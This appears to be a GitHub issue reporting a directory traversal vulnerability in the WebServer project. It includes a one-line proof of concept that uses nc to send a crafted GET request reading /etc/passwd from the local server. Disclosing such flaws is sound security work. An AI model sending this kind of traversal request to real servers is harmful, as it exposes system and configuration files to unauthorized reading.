WebServer icon indicating copy to clipboard operation
WebServer copied to clipboard

Published 20 hours ago verified publisher icon linyacool

Directory traversal.

Open happi0 opened this issue 1 year ago • 0 comments

Directory traversal.

Hackers can gain access to a wealth of sensitive information including configuration files.

For example, here I can read my /etc/passwd use echo -e "GET /../../../../../etc/passwd HTTP/1.0\r\nHost: 127.0.0.1:3000\r\n\r\n" | nc 127.0.0.1 3000

image

happi0 avatar Sep 01 '22 03:09 happi0